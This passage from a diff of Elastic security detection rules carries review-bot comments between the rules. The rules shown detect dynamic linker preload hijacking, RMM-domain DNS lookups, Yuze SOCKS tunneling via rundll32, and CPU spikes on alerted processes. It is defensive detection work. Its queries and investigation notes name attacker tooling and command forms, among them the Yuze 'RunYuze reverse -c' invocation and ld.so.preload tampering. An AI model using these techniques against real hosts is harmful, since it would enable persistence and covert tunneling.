OR path =\\n'/usr/lib64/ld-linux-x86-64.so.2' OR path = '/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' )\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - 
!{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n- The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Modification of Dynamic Linker Preload Shared Object Inside A Container - 342f834b-21a6-41bf-878c-87d116eba3ee\n- Modification of Dynamic Linker Preload Shared Object - 717f82c2-7741-4f9b-85b8-d06aeb853f4f\n- Shared Object Created or Changed by Previously Unknown Process - aebaa51f-2a91-4f6a-850b-b601db2293f4\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and process.name in (\"cp\", \"rsync\", \"mv\") and\n process.args in (\n \"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/etc/ld.so.preload\", \"/lib64/ld-linux-x86-64.so.2\",\n \"/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/usr/lib64/ld-linux-x86-64.so.2\"\n ) and\n not process.args like (\"/var/tmp/mkinitramfs*\", \"/var/tmp/dracut*\", \"/tmp/mkinitcpio*\")]\n[file where host.os.type == \"linux\" and event.action == \"creation\" and (file.extension == \"so\" or file.name like \"*.so.*\")]\n", + "references": [ + "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + 
"type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "df6f62d9-caab-4b88-affa-044f4395a1e0", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Orbit", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 215 + }, + "id": "df6f62d9-caab-4b88-affa-044f4395a1e0_215", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/df9c0e92-5dee-4f1d-a760-3a5c039e4382_4.json b/packages/security_detection_engine/kibana/security_rule/df9c0e92-5dee-4f1d-a760-3a5c039e4382_4.json new file mode 100644 index 00000000000..d82b080f4ec --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/df9c0e92-5dee-4f1d-a760-3a5c039e4382_4.json 
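Review bot: The investigation guide in `note` still says the rule monitors 'processes with names "cp" or "rsync"', but the query matches `process.name in ("cp", "rsync", "mv")`, so the guide under-describes the rule; the sentence should read `processes with names "cp", "rsync" or "mv"`, and the same paragraph's mention of a single loader path should reflect that the query checks five loader and preload paths. The first sequence step lists only x86-64 loader paths; if aarch64 Linux hosts are in scope, `"/lib/ld-linux-aarch64.so.1"` would be a natural addition to the `process.args in (...)` list, though that is a coverage decision rather than a defect. The `setup` text only describes Elastic Defend although `index` also reads `logs-sentinel_one_cloud_funnel.*` and the tags name SentinelOne as a data source; a sentence noting the SentinelOne Cloud Funnel alternative would keep the setup section consistent with the indices.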
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule correlates security alerts with processes exhibiting unusually high CPU utilization on the same host and process ID within a short time window. This behavior may indicate malicious activity such as malware execution, cryptomining, exploit payload execution, or abuse of system resources following initial compromise.", + "from": "now-9m", + "interval": "5m", + "language": "esql", + "license": "Elastic License v2", + "name": "Detection Alert on a Process Exhibiting CPU Spike", + "note": "## Triage and analysis\n\n### Investigating Detection Alert on a Process Exhibiting CPU Spike\n\nThis rule identifies processes that both triggered a security alert and exhibited unusually high CPU utilization on the\nsame host and process ID within a short time window. This combination may indicate malicious execution, resource abuse, or\npost-compromise activity.\n\n### Possible investigation steps\n- Review the correlated alert(s) to understand why the process was flagged by Elastic Defend.\n- Examine the process name, command line, and SHA-256 hash to determine whether the process is expected or known to be malicious.\n- Validate the observed CPU usage and duration to determine whether the spike is abnormal for this process and host.\n- Check for related process activity such as parent/child processes, suspicious process spawning, or privilege escalation attempts.\n- Review additional host telemetry including:\n - Network connections initiated by the process\n - File creation or modification events\n - Persistence mechanisms (services, scheduled tasks, registry keys)\n- Determine whether similar activity is observed on other hosts, which may indicate a broader compromise.\n\n### False positive analysis\n- Legitimate high-CPU processes such as software updates, backup agents, security scans, or system maintenance tasks.\n- Resource-intensive but benign applications (e.g., compilers, 
video encoding, data processing jobs).\n- Security tools or monitoring agents temporarily consuming high CPU.\n\n### Response and remediation\n- If malicious activity is confirmed, isolate the affected host to prevent further impact.\n- Terminate the offending process if safe to do so.\n- Remove any identified malicious binaries or artifacts and eliminate persistence mechanisms.\n- Apply relevant patches or configuration changes to remediate the root cause.\n- Monitor the environment for recurrence of similar high-CPU processes combined with security alerts.\n- Escalate the incident if multiple hosts or indicators suggest coordinated or widespread activity.", + "query": "FROM metrics-*, .alerts-security.* METADATA _index\n| where not KQL(\"\"\"kibana.alert.rule.tags : \"Rule Type: Higher-Order Rule\" \"\"\")\n| eval\n // processes with more than 70% total CPU use\n cpu_metrics_pids = CASE(_index like \".ds-metrics-system.process-*\" and system.process.cpu.total.norm.pct >= 0.7, process.pid, null),\n // any security alert with process.name and ID populated excluding low severity ones\n alerts_pids = CASE(_index like \".internal.alerts-security.*\" and kibana.alert.rule.name is not null and process.name is not null and process.pid is not null and host.id is not null and kibana.alert.risk_score > 21, process.pid, null)\n| stats pid_with_cpu_spike = COUNT_DISTINCT(cpu_metrics_pids), pid_with_alerts = COUNT_DISTINCT(alerts_pids),\n Esql.max_cpu_pct = MAX(system.process.cpu.total.norm.pct),\n Esql.alerts = VALUES(kibana.alert.rule.name),\n Esql.process_hash_sha256 = VALUES(process.hash.sha256),\n process_path = VALUES(process.executable),\n parent_process_path = VALUES(process.parent.executable),\n user_name = VALUES(user.name),\n host_name = VALUES(host.name),\n cmdline = VALUES(process.command_line) by process.pid, process.name, host.id\n| where pid_with_cpu_spike > 0 and pid_with_alerts > 0\n// populate fields to use in rule exceptions\n| eval process.hash.sha256 = 
MV_FIRST(Esql.process_hash_sha256),\n process.executable = MV_FIRST(process_path),\n process.parent.executable = MV_FIRST(parent_process_path),\n process.command_line = MV_FIRST(cmdline),\n user.name = MV_FIRST(user_name),\n host.name = MV_FIRST(host_name)\n| KEEP user.name, host.id, host.name, process.*, Esql.*\n| where `process.executable` != \"C:\\\\Program Files\\\\ESET\\\\ESET Security\\\\ekrn.exe\" and\n `process.executable` != \"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\" and\n `process.executable` != \"C:\\\\Program Files\\\\UiPath\\\\Studio\\\\UiPath.ActivityCompiler.CommandLine.exe\"\n", + "required_fields": [ + { + "ecs": false, + "name": "Esql.alerts", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.max_cpu_pct", + "type": "double" + }, + { + "ecs": false, + "name": "Esql.process_hash_sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.hash.sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "df9c0e92-5dee-4f1d-a760-3a5c039e4382", + "setup": "## Setup\n\nThis rule requires host CPU metrics collected via the Elastic Agent **System** integration.\n\n### System Metrics Integration Setup\nThe System integration collects host-level metrics such as CPU usage, load, memory, and process statistics and sends them to Elasticsearch using Elastic Agent.\n\n#### Prerequisite Requirements:\n- Elastic Agent managed by Fleet\n- A Fleet Server 
configured and reachable\n Refer to the Fleet Server setup guide:\n https://www.elastic.co/guide/en/fleet/current/fleet-server.html\n\n#### The following steps should be executed in order to enable CPU metrics collection:\n- Go to the Kibana home page and click **Add integrations**.\n- In the search bar, enter **System** and select the **System** integration.\n- Click **Add System**.\n- Configure an integration name and optionally add a description.\n- Under **Metrics**, ensure the following datasets are enabled:\n - `system.cpu`\n - `system.load` (optional but recommended)\n - `system.process` (optional, if process-level CPU is required)\n- Review optional and advanced settings as needed.\n- Add the integration to an existing agent policy or create a new agent policy.\n- Deploy the Elastic Agent to the hosts from which CPU metrics should be collected.\n- Click **Save and Continue** to finalize the setup.\n\n#### Validation\nAfter deployment, verify CPU metrics ingestion by confirming the presence of documents in:\n- `metrics-system.cpu-*`\n- `metrics-system.load-*` (if enabled)\n\nFor more details on the System integration and available metrics, refer to the documentation:\nhttps://docs.elastic.co/integrations/system\n", + "severity": "high", + "tags": [ + "Use Case: Threat Detection", + "Rule Type: Higher-Order Rule", + "Resources: Investigation Guide", + "Domain: Endpoint", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 4 + }, + "id": "df9c0e92-5dee-4f1d-a760-3a5c039e4382_4", + "type": "security-rule" +} \ No newline at end of file 
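Review bot: The three exclusions at the end of `query` key on `process.executable` alone, and nothing in the query ties those paths to `process.code_signature.*` or `process.hash.sha256`, so any binary placed at one of those paths is excluded regardless of signer; the comment just above them says these fields are populated for rule exceptions, so the cleaner defensive shape is to drop the hard-coded `where` and express the allowlist as rule exceptions that pair the path with `process.code_signature.subject_name` or `process.hash.sha256`. Unlike the e5f6a7b8 and e7f2c4a1 files in this commit, this rule has no `related_integrations` stanza even though `setup` says it depends on the System integration, presumably `{ "package": "system", "version": "<constraint-to-confirm>" }`. The only `threat` entry carries `"technique": []`; if the description's cryptomining/resource-abuse intent is the target, either map a technique or document in `note` why none is mapped. The three excluded paths are Windows-only while `FROM metrics-*` is cross-platform and there is no `OS:` tag, which is worth a sentence in `note` so Linux/macOS analysts know the exclusions do not apply to them.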
diff --git a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_4.json b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_4.json deleted file mode 100644 index 98d3ba8d45c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_4.json +++ /dev/null 
@@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "building_block_type": "default", - "description": "Adversaries may attempt to get a listing of network connections to or from a compromised system.", - "from": "now-119m", - "index": [ - "logs-endpoint.events.*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" - ], - "interval": "60m", - "language": "eql", - "license": "Elastic License v2", - "name": "System Network Connections Discovery", - "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nprocess.name in (\"netstat\", \"lsof\", \"who\", \"w\")\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - }, - { - "package": "auditd_manager", - "version": "^1.18.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "e2dc8f8c-5f16-42fa-b49e-0eb8057f7444", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1049", - "name": "System Network Connections Discovery", - "reference": "https://attack.mitre.org/techniques/T1049/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 4 - }, - "id": "e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_4", - "type": "security-rule" -} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/e5f6a7b8-c9d0-8e1f-2a3b-4c5d6e7f8a9b_3.json b/packages/security_detection_engine/kibana/security_rule/e5f6a7b8-c9d0-8e1f-2a3b-4c5d6e7f8a9b_3.json new file mode 100644 index 00000000000..b6115668173 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e5f6a7b8-c9d0-8e1f-2a3b-4c5d6e7f8a9b_3.json 
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains from processes that are not browsers. Intended to surface RMM clients, scripts, or other non-browser activity contacting these services.", + "from": "now-7205m", + "interval": "5m", + "language": "esql", + "license": "Elastic License v2", + "name": "First Time Seen DNS Query to RMM Domain", + "note": "## Triage and analysis\n\n### Investigating First Time Seen DNS Query to RMM Domain\n\nThis rule flags DNS queries to commonly abused RMM or remote access domains when the requesting process is not a browser. Legitimate RMM and remote desktop software is frequently abused for C2, persistence, and lateral movement.\n\n### Possible investigation steps\n\n- Identify the process process.executable that performed the DNS query and verify if it is an approved RMM or remote access tool.\n- Review the full process tree and parent process to understand how the binary was launched.\n- Check process.code_signature for trusted RMM publishers; unsigned or unexpected signers may indicate abuse or trojanized installers.\n- Correlate with the companion rule \"First Time Seen Remote Monitoring and Management Tool\" for the same host to see if the RMM process was first-time seen.\n- Investigate other alerts for the same host or user in the past 48 hours.\n\n### False positive analysis\n\n- Approved RMM or remote support tools used by IT will trigger this rule; consider allowlisting by process path or code signer for known managed tools.\n- Some updaters or installers (e.g. 
signed by the RMM vendor) may resolve these domains; combine with process name or parent context to reduce noise.\n\n### Response and remediation\n\n- If unauthorized RMM use is confirmed: isolate the host, remove the RMM software, rotate credentials, and block the domains at DNS/firewall where policy permits.\n- Enforce policy that only approved RMM tools from approved publishers may be used, and only by authorized staff.\n", + "query": "FROM logs-endpoint.events.network-*, logs-windows.sysmon_operational-* METADATA _index\n| WHERE host.os.type == \"windows\"\n AND event.category == \"network\"\n AND event.action in (\"lookup_requested\", \"DNSEvent (DNS query)\")\n AND dns.question.name IS NOT NULL\n\n// Exclude browser processes\n| WHERE NOT\n process.name IN (\n \"chrome.exe\", \"msedge.exe\", \"MicrosoftEdge.exe\", \"MicrosoftEdgeCP.exe\",\n \"firefox.exe\", \"iexplore.exe\", \"safari.exe\", \"brave.exe\",\n \"opera.exe\", \"vivaldi.exe\", \"msedgewebview2.exe\"\n )\n\n// Extract the parent domain (last two labels, e.g. 
example.com)\n| GROK dns.question.name \"\"\"(?:[^.]+\\.)+(?[^.]+\\.[^.]+)$\"\"\"\n| EVAL parent_domain = COALESCE(parent_domain, dns.question.name)\n\n// Known RMM parent domains, add or remove entries here as your environment changes.\n| WHERE parent_domain IN (\n \"teamviewer.com\",\n \"logmein.com\",\n \"logmeinrescue.com\",\n \"logmeininc.com\",\n \"internapcdn.net\",\n \"anydesk.com\",\n \"screenconnect.com\",\n \"connectwise.com\",\n \"splashtop.com\",\n \"zohoassist.com\",\n \"dwservice.net\",\n \"gotoassist.com\",\n \"getgo.com\",\n \"logmeinrescue.com\",\n \"rustdesk.com\",\n \"remoteutilities.com\",\n \"atera.com\",\n \"ammyy.com\",\n \"n-able.com\",\n \"kaseya.net\",\n \"bomgar.com\",\n \"beyondtrustcloud.com\",\n \"parsec.app\",\n \"parsecusercontent.com\",\n \"tailscale.com\",\n \"twingate.com\",\n \"jumpcloud.com\",\n \"vnc.com\",\n \"remotepc.com\",\n \"netsupportsoftware.com\",\n \"getscreen.me\",\n \"beanywhere.com\",\n \"swi-rc.com\",\n \"swi-tc.com\",\n \"qetqo.com\",\n \"tmate.io\",\n \"playanext.com\",\n \"supremocontrol.com\",\n \"itarian.com\",\n \"datto.com\",\n \"auvik.com\",\n \"syncromsp.com\",\n \"pulseway.com\",\n \"immy.bot\",\n \"immybot.com\",\n \"level.io\",\n \"ninjarmm.com\",\n \"ninjaone.com\",\n \"centrastage.net\",\n \"datto.net\",\n \"liongard.com\",\n \"naverisk.com\",\n \"panorama9.com\",\n \"superops.ai\",\n \"superops.com\",\n \"tacticalrmm.com\",\n \"meshcentral.com\",\n \"remotly.com\",\n \"fixme.it\",\n \"islonline.com\",\n \"zoho.eu\",\n \"goverlan.com\",\n \"iperius.net\",\n \"iperiusremote.com\",\n \"remotix.com\",\n \"mikogo.com\",\n \"r-hud.net\",\n \"pcvisit.de\",\n \"netviewer.com\",\n \"helpwire.app\",\n \"remotetopc.com\",\n \"rport.io\",\n \"action1.com\",\n \"tiflux.com\",\n \"gotoresolve.com\"\n)\n\n// Aggregate by parent domain and get 1st time seen timestamp as well as unique count of agents\n| STATS\n event_count = COUNT(*),\n Esql.first_time_seen = MIN(@timestamp),\n Esql.count_distinct_host_id = 
COUNT_DISTINCT(host.id),\n Esql.process_executable_values = VALUES(process.executable),\n Esql.dns_question_name_values = VALUES(dns.question.name),\n Esql.host_name_values = VALUES(host.name) BY parent_domain\n\n// Calculate the time difference between first time seen and rule execution time\n| eval Esql.recent = DATE_DIFF(\"minute\", Esql.first_time_seen, now())\n\n// First time seen is within 6m of the rule execution time and first seen in the last 5 days as per the rule from schedule and limited to 1 unique host\n| where Esql.recent <= 6 and Esql.count_distinct_host_id == 1\n\n// populate fields for rule exception\n| eval host.name = MV_FIRST(Esql.host_name_values),\n process.executable = MV_FIRST(Esql.process_executable_values), dns.question.name = MV_FIRST(Esql.dns_question_name_values)\n| keep host.name, process.executable, dns.question.name, Esql.*\n", + "references": [ + "https://attack.mitre.org/techniques/T1219/002/", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.count_distinct_host_id", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.dns_question_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.first_time_seen", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.host_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.process_executable_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.recent", + "type": "integer" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e5f6a7b8-c9d0-8e1f-2a3b-4c5d6e7f8a9b", + "severity": "medium", + 
"tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/", + "subtechnique": [ + { + "id": "T1219.002", + "name": "Remote Desktop Software", + "reference": "https://attack.mitre.org/techniques/T1219/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 3 + }, + "id": "e5f6a7b8-c9d0-8e1f-2a3b-4c5d6e7f8a9b_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e7f2c4a1-9b3d-5e8f-c6a0-2d1b4e7f8c3a_1.json b/packages/security_detection_engine/kibana/security_rule/e7f2c4a1-9b3d-5e8f-c6a0-2d1b4e7f8c3a_1.json new file mode 100644 index 00000000000..2236da9cf0c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e7f2c4a1-9b3d-5e8f-c6a0-2d1b4e7f8c3a_1.json 
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of Yuze, a lightweight open-source tunneling tool used for intranet penetration. Yuze supports forward and reverse SOCKS5 proxy tunneling and is typically executed via rundll32 loading yuze.dll with the RunYuze export. Threat actors may use it to proxy C2 or pivot traffic.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Protocol Tunneling via Yuze", + "note": "## Triage and analysis\n\n### Investigating Potential Protocol Tunneling via Yuze\n\nYuze is a C-based tunneling tool used for intranet penetration and supports forward and reverse SOCKS5 proxy tunneling. It is commonly executed as `rundll32 yuze.dll,RunYuze reverse -c :` and has been observed in threat actor campaigns.\n\n### Possible investigation steps\n\n- Confirm the command line contains `yuze.dll` and `RunYuze`; typical form is `rundll32 yuze.dll,RunYuze reverse -c :`.\n- Extract the remote endpoint from the `-c` argument (C2 or relay) and look up the IP/domain in threat intelligence.\n- Locate where yuze.dll was loaded from; check file creation time to see if it was recently dropped.\n- Identify the parent process that started rundll32 (script, scheduled task, exploit, etc.) to understand the execution chain.\n- Correlate with network events for outbound connections from this host to the IP/port in the command line.\n\n### False positive analysis\n\n- Legitimate use of Yuze is rare; most hits are likely malicious or red-team. 
If you use Yuze for authorized testing, consider an exception by host or user.\n\n### Response and remediation\n\n- Isolate the host and terminate the rundll32 process.\n- Remove yuze.dll from disk and hunt for other copies or related artifacts.\n- Block the C2/relay IP or domain at DNS/firewall; rotate credentials if the tunnel was used for access.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n ( \n (process.args : \"reverse\" and process.args : (\"-c\", \"-s\")) or \n (process.args : (\"proxy\", \"fwd\") and process.args : \"-l\") \n ) and \n (?process.code_signature.exists == false or process.name : \"rundll32.exe\")\n", + "references": [ + "https://attack.mitre.org/techniques/T1572/", + "https://github.com/P001water/yuze", + "https://www.trendmicro.com/tr_tr/research/26/c/dissecting-a-warlock-attack.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e7f2c4a1-9b3d-5e8f-c6a0-2d1b4e7f8c3a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data 
Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "e7f2c4a1-9b3d-5e8f-c6a0-2d1b4e7f8c3a_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e882e934-2aaa-11f0-8272-f661ea17fbcc_4.json b/packages/security_detection_engine/kibana/security_rule/e882e934-2aaa-11f0-8272-f661ea17fbcc_4.json new file mode 100644 index 00000000000..a5f52664cdb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e882e934-2aaa-11f0-8272-f661ea17fbcc_4.json 
